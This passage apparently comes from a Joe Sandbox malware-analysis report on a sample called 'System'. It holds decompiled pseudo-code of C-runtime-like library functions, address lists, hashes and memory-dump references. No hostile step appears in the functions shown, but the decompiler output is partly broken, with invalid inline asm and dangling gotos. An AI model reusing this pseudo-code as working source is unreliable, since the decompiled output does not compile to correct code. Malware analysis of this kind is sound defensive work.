				if ( *((intOrPtr*)(_t180 + 0x10)) -  *((intOrPtr*)( *((intOrPtr*)(_t180 + 0x10)) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c54c36;
				0xe4c623d0();
				if (0xffffffff == 0) goto 0xe4c549f0;
				return E00007FF67FF6E4C623B0(_t85, _t87,  *(_t180 + 0x180) ^ _t183);
			}



























                                                                                                                                                              0x7ff6e4c549a0
                                                                                                                                                              0x7ff6e4c549a0
                                                                                                                                                              0x7ff6e4c549a0
                                                                                                                                                              0x7ff6e4c549a5
                                                                                                                                                              0x7ff6e4c549ae
                                                                                                                                                              0x7ff6e4c549b6
                                                                                                                                                              0x7ff6e4c549bd
                                                                                                                                                              0x7ff6e4c549c4
                                                                                                                                                              0x7ff6e4c549c7
                                                                                                                                                              0x7ff6e4c549ce
                                                                                                                                                              0x7ff6e4c549d1
                                                                                                                                                              0x7ff6e4c549d8
                                                                                                                                                              0x7ff6e4c549df
                                                                                                                                                              0x7ff6e4c549e5
                                                                                                                                                              0x7ff6e4c549f2
                                                                                                                                                              0x7ff6e4c549ff
                                                                                                                                                              0x7ff6e4c54a04
                                                                                                                                                              0x7ff6e4c54a09
                                                                                                                                                              0x7ff6e4c54a0e
                                                                                                                                                              0x7ff6e4c54a13
                                                                                                                                                              0x7ff6e4c54a18
                                                                                                                                                              0x7ff6e4c54a2d
                                                                                                                                                              0x7ff6e4c54a34
                                                                                                                                                              0x7ff6e4c54a3a
                                                                                                                                                              0x7ff6e4c54a3e
                                                                                                                                                              0x7ff6e4c54a42
                                                                                                                                                              0x7ff6e4c54a4a
                                                                                                                                                              0x7ff6e4c54a68
                                                                                                                                                              0x7ff6e4c54a75
                                                                                                                                                              0x7ff6e4c54a7e
                                                                                                                                                              0x7ff6e4c54a85
                                                                                                                                                              0x7ff6e4c54a8c
                                                                                                                                                              0x7ff6e4c54a93
                                                                                                                                                              0x7ff6e4c54a9a
                                                                                                                                                              0x7ff6e4c54aa1
                                                                                                                                                              0x7ff6e4c54aa8
                                                                                                                                                              0x7ff6e4c54abc
                                                                                                                                                              0x7ff6e4c54ac2
                                                                                                                                                              0x7ff6e4c54aca
                                                                                                                                                              0x7ff6e4c54add
                                                                                                                                                              0x7ff6e4c54aea
                                                                                                                                                              0x7ff6e4c54af2
                                                                                                                                                              0x7ff6e4c54af8
                                                                                                                                                              0x7ff6e4c54b03
                                                                                                                                                              0x7ff6e4c54b05
                                                                                                                                                              0x7ff6e4c54b0d
                                                                                                                                                              0x7ff6e4c54b0f
                                                                                                                                                              0x7ff6e4c54b1b
                                                                                                                                                              0x7ff6e4c54b29
                                                                                                                                                              0x7ff6e4c54b32
                                                                                                                                                              0x7ff6e4c54b3a
                                                                                                                                                              0x7ff6e4c54b3e
                                                                                                                                                              0x7ff6e4c54b41
                                                                                                                                                              0x7ff6e4c54b44
                                                                                                                                                              0x7ff6e4c54b48
                                                                                                                                                              0x7ff6e4c54b4c
                                                                                                                                                              0x7ff6e4c54b51
                                                                                                                                                              0x7ff6e4c54b56
                                                                                                                                                              0x7ff6e4c54b5f
                                                                                                                                                              0x7ff6e4c54b66
                                                                                                                                                              0x7ff6e4c54b6c
                                                                                                                                                              0x7ff6e4c54b72
                                                                                                                                                              0x7ff6e4c54b7b
                                                                                                                                                              0x7ff6e4c54b82
                                                                                                                                                              0x7ff6e4c54b91
                                                                                                                                                              0x7ff6e4c54ba4
                                                                                                                                                              0x7ff6e4c54bb9
                                                                                                                                                              0x7ff6e4c54bbb
                                                                                                                                                              0x7ff6e4c54bc0
                                                                                                                                                              0x7ff6e4c54bc4
                                                                                                                                                              0x7ff6e4c54bcc
                                                                                                                                                              0x7ff6e4c54bd0
                                                                                                                                                              0x7ff6e4c54bd8
                                                                                                                                                              0x7ff6e4c54beb
                                                                                                                                                              0x7ff6e4c54c00
                                                                                                                                                              0x7ff6e4c54c02
                                                                                                                                                              0x7ff6e4c54c09
                                                                                                                                                              0x7ff6e4c54c35

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                              • String ID: Error, couln't get the current entry info
                                                                                                                                                              • API String ID: 3668304517-3073648769
                                                                                                                                                              • Opcode ID: fb7025a1474a5d2879d4a7722f8de3fc888214da38b81039b7e7b993a1df45dc
                                                                                                                                                              • Instruction ID: 2d4681af6514f86a06903ca026187def6d6de8b6221484130d1d396d1caea15c
                                                                                                                                                              • Opcode Fuzzy Hash: fb7025a1474a5d2879d4a7722f8de3fc888214da38b81039b7e7b993a1df45dc
                                                                                                                                                              • Instruction Fuzzy Hash: 7AD14C77644A868AEB10CF7AD4803AD77B5F748BA8F504222DE5D83B99DF39D481C309
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C7C1E8 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 239COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 48%
                                                                                                                                                              			E00007FF67FF6E4C7C1E8(intOrPtr __esi, signed short* __rcx, signed short* __rdx, void* __r8, void* __r9) {
				void* __rbx;
				void* __rsi;
				signed short _t71;
				void* _t72;
				long _t73;
				char _t75;
				void* _t77;
				intOrPtr _t79;
				void* _t83;
				void* _t97;
				signed long long _t125;
				signed long long _t132;
				intOrPtr* _t133;
				intOrPtr* _t134;
				long long _t135;
				long long _t136;
				long long _t138;
				void* _t139;
				signed long long _t141;
				long long* _t142;
				void* _t144;
				signed long long _t150;
				void* _t159;
				long long _t162;
				void* _t177;
				void* _t182;
				long long _t193;
				void* _t194;
				void* _t195;
				signed long long _t196;
				intOrPtr* _t200;
				void* _t206;
				long long _t208;

				_t194 = _t195 - 0x27;
				_t196 = _t195 - 0x90;
				 *((long long*)(_t194 + 0xf)) = 0xfffffffe;
				_t125 =  *0xe4ca90a0; // 0x1ae1b17e2973
				 *(_t194 + 0x1f) = _t125 ^ _t196;
				 *(_t194 - 0x21) = __rdx;
				r15d = 0;
				_t79 = r15d;
				 *((intOrPtr*)(_t194 - 0x29)) = r15d;
				if (__rcx == 0) goto 0xe4c7c23a;
				if (__r8 != 0) goto 0xe4c7c23a;
				goto 0xe4c7c531;
				if (__rdx != 0) goto 0xe4c7c258;
				E00007FF67FF6E4C6C854(0);
				 *((long long*)(0)) = 0x16;
				E00007FF67FF6E4C6A5D8();
				goto 0xe4c7c531;
				E00007FF67FF6E4C686F4(0xffffffff, _t144, _t194 - 0x11, __r9, __r8);
				r10d =  *((intOrPtr*)( *((intOrPtr*)(_t194 - 9)) + 0xc));
				if (r10d != 0xfde9) goto 0xe4c7c297;
				 *((long long*)(_t194 - 0x19)) = 0;
				E00007FF67FF6E4C844EC(_t144, __rcx, _t194 - 0x21, __r8, _t194 - 0x19);
				goto 0xe4c7c51a;
				if (__rcx == 0) goto 0xe4c7c48c;
				if ( *0x00000138 != _t208) goto 0xe4c7c2f5;
				if (__r8 == 0) goto 0xe4c7c51a;
				if ( *__rcx - _t83 > 0) goto 0xe4c7c2e7;
				_t71 =  *__rcx;
				 *__rcx = _t71;
				_t132 =  *__rcx & 0x0000ffff;
				 *(_t194 - 0x21) =  &(__rcx[1]);
				if (_t71 == 0) goto 0xe4c7c51a;
				if (1 - __r8 < 0) goto 0xe4c7c2bb;
				goto 0xe4c7c51a;
				_t72 = E00007FF67FF6E4C6C854(_t132);
				goto 0xe4c7c514;
				_t200 =  *(_t194 - 0x21);
				if ( *((long long*)(_t132 + 8)) != 1) goto 0xe4c7c374;
				if (__r8 == 0) goto 0xe4c7c331;
				_t133 = _t200;
				_t97 =  *_t133 - r15w;
				if (_t97 == 0) goto 0xe4c7c31a;
				_t134 = _t133 + 2;
				if (_t97 != 0) goto 0xe4c7c30a;
				if (__r8 - 1 == 0) goto 0xe4c7c331;
				if ( *_t134 != r15w) goto 0xe4c7c331;
				_t193 = (_t134 - _t200 >> 1) + 1;
				_t135 = _t194 - 0x29;
				 *((long long*)(_t196 + 0x38)) = _t135;
				 *((long long*)(_t196 + 0x30)) = _t208;
				 *((long long*)(_t196 + 0x28)) = _t193;
				 *((long long*)(_t196 + 0x20)) = __rcx;
				r9d = __esi;
				E00007FF67FF6E4C7B214();
				_t159 = _t72;
				if (_t135 == 0) goto 0xe4c7c2e7;
				if ( *((intOrPtr*)(_t194 - 0x29)) != r15d) goto 0xe4c7c2e7;
				_t149 =  !=  ? _t159 : _t159 - 1;
				goto 0xe4c7c51a;
				_t136 = _t194 - 0x29;
				 *((long long*)(_t196 + 0x38)) = _t136;
				 *((long long*)(_t196 + 0x30)) = _t208;
				 *((long long*)(_t196 + 0x28)) = _t193;
				 *((long long*)(_t196 + 0x20)) = __rcx;
				_t150 = ( !=  ? _t159 : _t159 - 1) | 0xffffffff;
				r9d = _t79;
				E00007FF67FF6E4C7B214();
				_t182 = _t72;
				if (_t136 == 0) goto 0xe4c7c3b6;
				if ( *((intOrPtr*)(_t194 - 0x29)) != r15d) goto 0xe4c7c50f;
				goto 0xe4c7c51a;
				if ( *((intOrPtr*)(_t194 - 0x29)) != r15d) goto 0xe4c7c50f;
				_t73 = GetLastError();
				if (_t136 != 0x7a) goto 0xe4c7c50f;
				if (_t193 == 0) goto 0xe4c7c51d;
				_t35 = _t136 - 0x75; // -117
				r12d = _t35;
				_t74 =  >  ? r12d : _t73;
				 *((long long*)(_t196 + 0x38)) = _t194 - 0x29;
				 *((long long*)(_t196 + 0x30)) = _t208;
				 *((long long*)(_t196 + 0x28)) =  *((intOrPtr*)( *((intOrPtr*)(_t194 - 9)) + 8));
				_t138 = _t194 + 0x17;
				 *((long long*)(_t196 + 0x20)) = _t138;
				r9d = 1;
				E00007FF67FF6E4C7B214();
				if (_t138 == 0) goto 0xe4c7c50f;
				if ( *((intOrPtr*)(_t194 - 0x29)) != r15d) goto 0xe4c7c50f;
				if (_t138 < 0) goto 0xe4c7c50f;
				_t177 =  >  ? r12d : _t73;
				if (_t177 - _t206 > 0) goto 0xe4c7c50f;
				_t139 = _t177 + _t182;
				if (_t139 - _t193 > 0) goto 0xe4c7c51d;
				_t162 = _t208;
				if (_t177 <= 0) goto 0xe4c7c472;
				_t75 =  *((intOrPtr*)(_t194 + _t162 + 0x17));
				 *((char*)(__rcx + _t182)) = _t75;
				if (_t75 == 0) goto 0xe4c7c51d;
				if (_t162 + 1 - _t177 < 0) goto 0xe4c7c457;
				 *(_t194 - 0x21) =  &(( *(_t194 - 0x21))[1]);
				if (_t182 + 1 - _t193 >= 0) goto 0xe4c7c51d;
				goto 0xe4c7c3e0;
				if ( *((intOrPtr*)(_t139 + 0x138)) != _t208) goto 0xe4c7c4d0;
				if (_t75 == 0) goto 0xe4c7c51d;
				asm("adc [eax-0x1], ecx");
				asm("invalid");
				_t141 = ( *(_t194 - 0x21))[1] & 0x0000ffff;
				if (_t75 != 0) goto 0xe4c7c4a9;
				goto 0xe4c7c51d;
				E00007FF67FF6E4C6C854(_t141);
				 *_t141 = 0x2a;
				goto 0xe4c7c51d;
				_t142 = _t194 - 0x29;
				 *((long long*)(_t196 + 0x38)) = _t142;
				 *((long long*)(_t196 + 0x30)) = _t208;
				 *((intOrPtr*)(_t196 + 0x28)) = r15d;
				 *((long long*)(_t196 + 0x20)) = _t208;
				r9d = _t79;
				E00007FF67FF6E4C7B214();
				if (_t142 == 0) goto 0xe4c7c50f;
				if ( *((intOrPtr*)(_t194 - 0x29)) != r15d) goto 0xe4c7c50f;
				goto 0xe4c7c51d;
				_t77 = E00007FF67FF6E4C6C854(_t142);
				 *_t142 = 0x2a;
				if ( *((intOrPtr*)(_t194 + 7)) == r15b) goto 0xe4c7c52e;
				 *( *((intOrPtr*)(_t194 - 0x11)) + 0x3a8) =  *( *((intOrPtr*)(_t194 - 0x11)) + 0x3a8) & 0xfffffffd;
				return E00007FF67FF6E4C623B0(_t77, r10d,  *(_t194 + 0x1f) ^ _t196);
			}




































                                                                                                                                                              0x7ff6e4c7c1f3
                                                                                                                                                              0x7ff6e4c7c1f8
                                                                                                                                                              0x7ff6e4c7c1ff
                                                                                                                                                              0x7ff6e4c7c207
                                                                                                                                                              0x7ff6e4c7c211
                                                                                                                                                              0x7ff6e4c7c21b
                                                                                                                                                              0x7ff6e4c7c21f
                                                                                                                                                              0x7ff6e4c7c222
                                                                                                                                                              0x7ff6e4c7c225
                                                                                                                                                              0x7ff6e4c7c22c
                                                                                                                                                              0x7ff6e4c7c231
                                                                                                                                                              0x7ff6e4c7c235
                                                                                                                                                              0x7ff6e4c7c23d
                                                                                                                                                              0x7ff6e4c7c23f
                                                                                                                                                              0x7ff6e4c7c244
                                                                                                                                                              0x7ff6e4c7c24a
                                                                                                                                                              0x7ff6e4c7c253
                                                                                                                                                              0x7ff6e4c7c25f
                                                                                                                                                              0x7ff6e4c7c269
                                                                                                                                                              0x7ff6e4c7c274
                                                                                                                                                              0x7ff6e4c7c278
                                                                                                                                                              0x7ff6e4c7c28a
                                                                                                                                                              0x7ff6e4c7c292
                                                                                                                                                              0x7ff6e4c7c29a
                                                                                                                                                              0x7ff6e4c7c2a7
                                                                                                                                                              0x7ff6e4c7c2ac
                                                                                                                                                              0x7ff6e4c7c2be
                                                                                                                                                              0x7ff6e4c7c2c0
                                                                                                                                                              0x7ff6e4c7c2c2
                                                                                                                                                              0x7ff6e4c7c2c6
                                                                                                                                                              0x7ff6e4c7c2cd
                                                                                                                                                              0x7ff6e4c7c2d4
                                                                                                                                                              0x7ff6e4c7c2e0
                                                                                                                                                              0x7ff6e4c7c2e2
                                                                                                                                                              0x7ff6e4c7c2e7
                                                                                                                                                              0x7ff6e4c7c2f0
                                                                                                                                                              0x7ff6e4c7c2f5
                                                                                                                                                              0x7ff6e4c7c2fd
                                                                                                                                                              0x7ff6e4c7c302
                                                                                                                                                              0x7ff6e4c7c304
                                                                                                                                                              0x7ff6e4c7c30a
                                                                                                                                                              0x7ff6e4c7c30e
                                                                                                                                                              0x7ff6e4c7c310
                                                                                                                                                              0x7ff6e4c7c318
                                                                                                                                                              0x7ff6e4c7c31d
                                                                                                                                                              0x7ff6e4c7c323
                                                                                                                                                              0x7ff6e4c7c32e
                                                                                                                                                              0x7ff6e4c7c331
                                                                                                                                                              0x7ff6e4c7c335
                                                                                                                                                              0x7ff6e4c7c33a
                                                                                                                                                              0x7ff6e4c7c33f
                                                                                                                                                              0x7ff6e4c7c343
                                                                                                                                                              0x7ff6e4c7c348
                                                                                                                                                              0x7ff6e4c7c350
                                                                                                                                                              0x7ff6e4c7c355
                                                                                                                                                              0x7ff6e4c7c35a
                                                                                                                                                              0x7ff6e4c7c360
                                                                                                                                                              0x7ff6e4c7c36b
                                                                                                                                                              0x7ff6e4c7c36f
                                                                                                                                                              0x7ff6e4c7c374
                                                                                                                                                              0x7ff6e4c7c378
                                                                                                                                                              0x7ff6e4c7c37d
                                                                                                                                                              0x7ff6e4c7c382
                                                                                                                                                              0x7ff6e4c7c386
                                                                                                                                                              0x7ff6e4c7c38b
                                                                                                                                                              0x7ff6e4c7c38f
                                                                                                                                                              0x7ff6e4c7c397
                                                                                                                                                              0x7ff6e4c7c39c
                                                                                                                                                              0x7ff6e4c7c3a1
                                                                                                                                                              0x7ff6e4c7c3a7
                                                                                                                                                              0x7ff6e4c7c3b1
                                                                                                                                                              0x7ff6e4c7c3ba
                                                                                                                                                              0x7ff6e4c7c3c0
                                                                                                                                                              0x7ff6e4c7c3c9
                                                                                                                                                              0x7ff6e4c7c3d2
                                                                                                                                                              0x7ff6e4c7c3d8
                                                                                                                                                              0x7ff6e4c7c3d8
                                                                                                                                                              0x7ff6e4c7c3ea
                                                                                                                                                              0x7ff6e4c7c3f2
                                                                                                                                                              0x7ff6e4c7c3f7
                                                                                                                                                              0x7ff6e4c7c3fc
                                                                                                                                                              0x7ff6e4c7c400
                                                                                                                                                              0x7ff6e4c7c404
                                                                                                                                                              0x7ff6e4c7c409
                                                                                                                                                              0x7ff6e4c7c417
                                                                                                                                                              0x7ff6e4c7c41e
                                                                                                                                                              0x7ff6e4c7c428
                                                                                                                                                              0x7ff6e4c7c430
                                                                                                                                                              0x7ff6e4c7c436
                                                                                                                                                              0x7ff6e4c7c43c
                                                                                                                                                              0x7ff6e4c7c442
                                                                                                                                                              0x7ff6e4c7c449
                                                                                                                                                              0x7ff6e4c7c44f
                                                                                                                                                              0x7ff6e4c7c455
                                                                                                                                                              0x7ff6e4c7c457
                                                                                                                                                              0x7ff6e4c7c45b
                                                                                                                                                              0x7ff6e4c7c461
                                                                                                                                                              0x7ff6e4c7c470
                                                                                                                                                              0x7ff6e4c7c47a
                                                                                                                                                              0x7ff6e4c7c481
                                                                                                                                                              0x7ff6e4c7c487
                                                                                                                                                              0x7ff6e4c7c493
                                                                                                                                                              0x7ff6e4c7c4a2
                                                                                                                                                              0x7ff6e4c7c4ad
                                                                                                                                                              0x7ff6e4c7c4b0
                                                                                                                                                              0x7ff6e4c7c4b5
                                                                                                                                                              0x7ff6e4c7c4bb
                                                                                                                                                              0x7ff6e4c7c4bd
                                                                                                                                                              0x7ff6e4c7c4bf
                                                                                                                                                              0x7ff6e4c7c4c4
                                                                                                                                                              0x7ff6e4c7c4ce
                                                                                                                                                              0x7ff6e4c7c4d0
                                                                                                                                                              0x7ff6e4c7c4d4
                                                                                                                                                              0x7ff6e4c7c4d9
                                                                                                                                                              0x7ff6e4c7c4de
                                                                                                                                                              0x7ff6e4c7c4e3
                                                                                                                                                              0x7ff6e4c7c4ec
                                                                                                                                                              0x7ff6e4c7c4f8
                                                                                                                                                              0x7ff6e4c7c502
                                                                                                                                                              0x7ff6e4c7c508
                                                                                                                                                              0x7ff6e4c7c50d
                                                                                                                                                              0x7ff6e4c7c50f
                                                                                                                                                              0x7ff6e4c7c514
                                                                                                                                                              0x7ff6e4c7c521
                                                                                                                                                              0x7ff6e4c7c527
                                                                                                                                                              0x7ff6e4c7c54e

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                              • String ID: 123
                                                                                                                                                              • API String ID: 3215553584-2286445522
                                                                                                                                                              • Opcode ID: 76a5855774d4ef26e717e37e25cc78b3b92881b049990117f99112216bd140cb
                                                                                                                                                              • Instruction ID: 17736fc1d00a981306f936fce3e8d4f5cd4c104c06bd2844be43f6152cab6188
                                                                                                                                                              • Opcode Fuzzy Hash: 76a5855774d4ef26e717e37e25cc78b3b92881b049990117f99112216bd140cb
                                                                                                                                                              • Instruction Fuzzy Hash: E6A1B467B5D64387EB618B7094C83BD22B1AB44FA4F004632DE6E87AC4DF3ED441C61A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C50010 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 177COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 77%
                                                                                                                                                              			E00007FF67FF6E4C50010(void* __eax, void* __esi, long long* __rcx, signed int __rdx, void* __rbp, void* __r8, long long _a8, signed long long _a16, signed long long _a32) {
				signed long long _v64;
				long long _v72;
				signed int _v80;
				long long _v88;
				void* __rbx;
				void* __rsi;
				void* _t66;
				void* _t67;
				signed int _t68;
				long long _t101;
				signed long long _t112;
				signed long long _t113;
				long long _t115;
				long long _t117;
				unsigned long long _t126;
				signed long long _t143;
				unsigned long long _t145;
				signed long long _t150;
				long long* _t159;
				signed int _t170;
				signed long long _t175;
				signed int _t176;
				void* _t177;
				signed long long _t178;
				signed long long _t183;

				_a8 = __rcx;
				_t177 = __r8;
				_t176 = __rdx;
				_t159 = __rcx;
				_t143 = (__rdx >> 5) + (__rdx >> 5 >> 0x3f);
				if (_t143 == 0x49249249) goto 0xe4c50294;
				_t11 = _t143 + 1; // 0x24924924924924a
				_t170 = _t11;
				_v80 = _t170;
				_t145 = (_t143 >> 5) + (_t143 >> 5 >> 0x3f);
				_t126 = _t145 >> 1;
				if (_t145 - 0x49249249 - _t126 > 0) goto 0xe4c5028e;
				_t101 = _t126 + _t145;
				_t112 =  >=  ? _t101 : _t170;
				if (_t112 - 0x49249249 > 0) goto 0xe4c5028e;
				_t175 = _t112 * 0x70;
				_a32 = _t112;
				if (_t175 - 0x1000 < 0) goto 0xe4c50114;
				_t20 = _t175 + 0x27; // 0x27
				if (_t20 - _t175 <= 0) goto 0xe4c5028e;
				E00007FF67FF6E4C623D8(_t101, _t20);
				if (_t101 == 0) goto 0xe4c5029a;
				_t21 = _t101 + 0x27; // 0x27
				 *((long long*)((_t21 & 0xffffffe0) - 8)) = _t101;
				goto 0xe4c5013d;
				if (_t175 == 0) goto 0xe4c50133;
				E00007FF67FF6E4C623D8(_t101, _t175);
				_v88 = _t101;
				_a32 = _t112;
				goto 0xe4c50142;
				_a32 = _t112;
				_v88 = 0;
				_t183 = ((__rdx >> 5) + (__rdx >> 5 >> 0x3f)) * 0x70;
				_t113 = _t183 + 0x70;
				_v72 = _t113;
				_a16 = _t113;
				_v64 = _t183;
				E00007FF67FF6E4C49E00(_t101, _t113, _t183, __r8, _t159);
				_t32 = _t177 + 0x20; // 0x20
				E00007FF67FF6E4C49E00(_t101, _t113, _t183 + 0x20, _t32, _t159);
				 *((long long*)(_t183 + 0x40)) =  *((intOrPtr*)(_t177 + 0x40));
				 *((long long*)(_t183 + 0x48)) =  *((intOrPtr*)(_t177 + 0x48));
				 *((intOrPtr*)(_t183 + 0x50)) =  *((intOrPtr*)(_t177 + 0x50));
				asm("inc ecx");
				asm("inc ecx");
				asm("repne inc ecx");
				asm("repne inc ecx");
				_a16 = _t183;
				if (_t176 !=  *(_t159 + 8)) goto 0xe4c501bf;
				goto 0xe4c501dc;
				_t66 = E00007FF67FF6E4C50870( *((intOrPtr*)(_t177 + 0x50)),  *_t159, _t176, 0, 0x24924925);
				_a16 = 0;
				_t150 =  *(_t159 + 8);
				_t67 = E00007FF67FF6E4C50870(_t66, _t176, _t150, 0, 0x24924925);
				_t115 =  *_t159;
				if (_t115 == 0) goto 0xe4c50263;
				_t178 =  *(_t159 + 8);
				if (_t115 == _t178) goto 0xe4c50214;
				_t68 = E00007FF67FF6E4C4D800(_t67, _t115);
				if (_t115 + 0x70 != _t178) goto 0xe4c50200;
				_t117 =  *_t159;
				if (((_t150 >> 5) + (_t150 >> 5 >> 0x3f)) * 0x70 - 0x1000 < 0) goto 0xe4c5025b;
				if (_t117 -  *((intOrPtr*)(_t117 - 8)) - 8 - 0x1f > 0) goto 0xe4c5029a;
				0xe4c623d0();
				 *_t159 = 0;
				 *(_t159 + 8) = _v80 * 0x70;
				 *(_t159 + 0x10) = _t175;
				return _t68 * ( *(_t159 + 0x10) - _t117);
			}




























                                                                                                                                                              0x7ff6e4c50010
                                                                                                                                                              0x7ff6e4c50024
                                                                                                                                                              0x7ff6e4c50027
                                                                                                                                                              0x7ff6e4c5002a
                                                                                                                                                              0x7ff6e4c5006f
                                                                                                                                                              0x7ff6e4c5007f
                                                                                                                                                              0x7ff6e4c50085
                                                                                                                                                              0x7ff6e4c50085
                                                                                                                                                              0x7ff6e4c50089
                                                                                                                                                              0x7ff6e4c500a6
                                                                                                                                                              0x7ff6e4c500ac
                                                                                                                                                              0x7ff6e4c500b8
                                                                                                                                                              0x7ff6e4c500be
                                                                                                                                                              0x7ff6e4c500c8
                                                                                                                                                              0x7ff6e4c500cf
                                                                                                                                                              0x7ff6e4c500d5
                                                                                                                                                              0x7ff6e4c500d9
                                                                                                                                                              0x7ff6e4c500e8
                                                                                                                                                              0x7ff6e4c500ea
                                                                                                                                                              0x7ff6e4c500f2
                                                                                                                                                              0x7ff6e4c500f8
                                                                                                                                                              0x7ff6e4c50100
                                                                                                                                                              0x7ff6e4c50106
                                                                                                                                                              0x7ff6e4c5010e
                                                                                                                                                              0x7ff6e4c50112
                                                                                                                                                              0x7ff6e4c50117
                                                                                                                                                              0x7ff6e4c5011c
                                                                                                                                                              0x7ff6e4c50124
                                                                                                                                                              0x7ff6e4c50129
                                                                                                                                                              0x7ff6e4c50131
                                                                                                                                                              0x7ff6e4c50135
                                                                                                                                                              0x7ff6e4c5013d
                                                                                                                                                              0x7ff6e4c50146
                                                                                                                                                              0x7ff6e4c50149
                                                                                                                                                              0x7ff6e4c5014d
                                                                                                                                                              0x7ff6e4c50152
                                                                                                                                                              0x7ff6e4c5015a
                                                                                                                                                              0x7ff6e4c50165
                                                                                                                                                              0x7ff6e4c5016b
                                                                                                                                                              0x7ff6e4c50173
                                                                                                                                                              0x7ff6e4c5017c
                                                                                                                                                              0x7ff6e4c50184
                                                                                                                                                              0x7ff6e4c5018c
                                                                                                                                                              0x7ff6e4c50190
                                                                                                                                                              0x7ff6e4c50195
                                                                                                                                                              0x7ff6e4c5019a
                                                                                                                                                              0x7ff6e4c501a0
                                                                                                                                                              0x7ff6e4c501a6
                                                                                                                                                              0x7ff6e4c501b8
                                                                                                                                                              0x7ff6e4c501bd
                                                                                                                                                              0x7ff6e4c501c8
                                                                                                                                                              0x7ff6e4c501cd
                                                                                                                                                              0x7ff6e4c501d5
                                                                                                                                                              0x7ff6e4c501e2
                                                                                                                                                              0x7ff6e4c501e8
                                                                                                                                                              0x7ff6e4c501ee
                                                                                                                                                              0x7ff6e4c501f0
                                                                                                                                                              0x7ff6e4c501f7
                                                                                                                                                              0x7ff6e4c50203
                                                                                                                                                              0x7ff6e4c5020f
                                                                                                                                                              0x7ff6e4c50211
                                                                                                                                                              0x7ff6e4c50241
                                                                                                                                                              0x7ff6e4c50256
                                                                                                                                                              0x7ff6e4c5025e
                                                                                                                                                              0x7ff6e4c50263
                                                                                                                                                              0x7ff6e4c5026f
                                                                                                                                                              0x7ff6e4c50277
                                                                                                                                                              0x7ff6e4c5028d

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                              • String ID: ios_base::failbit set
                                                                                                                                                              • API String ID: 73155330-3924258884
                                                                                                                                                              • Opcode ID: 1c5bb32fbe5568fbaa0eaf02db7bac12b8ae68e6ffdb6003fc2ff8b0837e4e8d
                                                                                                                                                              • Instruction ID: 06e29503d5d3554b0e1408f22b2e570003de6ea1f7886a4d584f4e7ca945288d
                                                                                                                                                              • Opcode Fuzzy Hash: 1c5bb32fbe5568fbaa0eaf02db7bac12b8ae68e6ffdb6003fc2ff8b0837e4e8d
                                                                                                                                                              • Instruction Fuzzy Hash: F051D46BB05B5A42DE24DF26A4846BEA3A5FB49FC0F148036DE9D87795DE3DE080C305
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C66D44 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 74%
